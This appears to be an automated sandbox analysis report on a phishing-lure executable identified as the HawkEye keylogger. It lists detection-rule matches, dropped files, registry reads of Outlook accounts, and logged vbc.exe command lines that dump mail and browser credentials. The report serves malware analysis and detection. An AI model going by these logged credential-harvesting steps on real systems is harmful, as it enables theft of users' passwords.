              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 8.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 8.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 11.2.WindowsUpdate.exe.1ee40000.4.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 11.2.WindowsUpdate.exe.1ee40000.4.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 11.2.WindowsUpdate.exe.1ee40000.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 11.2.WindowsUpdate.exe.1ee40000.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 11.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 11.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 11.0.WindowsUpdate.exe.ed0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_RANSOM_COVID19_Apr20_1 date = 2020-04-15, hash1 = 2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326, author = Florian Roth, description = Detects ransomware distributed in COVID-19 theme, reference = https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 8.2.WindowsUpdate.exe.1c5f0000.4.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 8.2.WindowsUpdate.exe.1c5f0000.4.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 8.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 8.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 8.2.WindowsUpdate.exe.1ee00000.5.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 8.2.WindowsUpdate.exe.1ee00000.5.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 8.2.WindowsUpdate.exe.1c5f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 8.2.WindowsUpdate.exe.1c5f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 11.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 11.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 11.2.WindowsUpdate.exe.1c5f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 11.2.WindowsUpdate.exe.1c5f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 8.2.WindowsUpdate.exe.1ee00000.5.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 8.2.WindowsUpdate.exe.1ee00000.5.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@10/13@1/3
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_00415AFD GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,3_2_00415AFD
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_00415F87 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,3_2_00415F87
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,3_2_00411196
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,0_2_00401489
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeFile created: C:\Users\user\AppData\Roaming\pid.txtJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2148
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBB95.tmpJump to behavior
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: WindowsUpdate.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: WindowsUpdate.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, vbc.exe, 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, WindowsUpdate.exe, 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, WindowsUpdate.exe, 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: WindowsUpdate.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: WindowsUpdate.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: WindowsUpdate.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: WindowsUpdate.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeReversingLabs: Detection: 36%
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeFile read: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe 'C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe'
              Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2216
              Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
              Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
              Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2148 -s 2244
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe 'C:\Users\user\AppData\Roaming\WindowsUpdate.exe'
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe 'C:\Users\user\AppData\Roaming\WindowsUpdate.exe'
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2216Jump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'Jump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'Jump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeStatic file information: File size 1074688 > 1048576
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: rsaenh.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: 1:pC:\Windows\mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321080904.0000000021E7A000.00000004.00000010.sdmp
              Source: Binary string: wkernel32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: bcrypt.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: ws2_32.pdb0up source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: ucrtbase.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: System.Configuration.pdbKt0 source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wbemcomn.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: NapiNSP.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: msvcrt.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wrpcrt4.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wntdll.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321080904.0000000021E7A000.00000004.00000010.sdmp
              Source: Binary string: f:\binaries.x86ret\bin\i386\bbt\opt\bin\i386\diasymreader.pdb:p source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: powrprof.pdbBuP source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscoreei.pdbOs source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: winnsi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscms.pdbQn source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: cryptsp.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: C:\Windows\mscorlib.pdbd source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
              Source: Binary string: advapi32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wsspicli.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: msi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: CLBCatQ.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: ntmarta.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: dhcpcsvc.pdbFp@ source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wwin32u.pdbup source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: cryptsp.pdb`t0 source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wkernelbase.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: psapi.pdb7u` source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: shlwapi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: version.pdbht source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: WindowsUpdate.exe
              Source: Binary string: mscorjit.pdbbt source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: ODBC32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: WindowsUpdate.exe
              Source: Binary string: dwmapi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscoree.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: Windows.Storage.pdbcw source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: ws2_32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscorlib.pdbDr source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: msasn1.pdb8u source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: f:\binaries.x86ret\bin\i386\bbt\opt\bin\i386\diasymreader.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: iphlpapi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: nsi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscorlib.pdb6 source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
              Source: Binary string: rasman.pdb2o source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: powrprof.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: System.Configuration.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: ole32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: rlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
              Source: Binary string: msasn1.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321080904.0000000021E7A000.00000004.00000010.sdmp, WERD288.tmp.mdmp.6.dr
              Source: Binary string: DWrite.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: cfgmgr32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: System.Drawing.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: System.Management.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: combase.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: Windows.Storage.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: dhcpcsvc6.pdb]s0 source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
              Source: Binary string: dpapi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: apphelp.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: rasadhlp.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
              Source: Binary string: dhcpcsvc.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: dwmapi.pdbHt0 source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: pnrpnsp.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: cryptbase.pdbjt source: WERD288.tmp.mdmp.6.dr
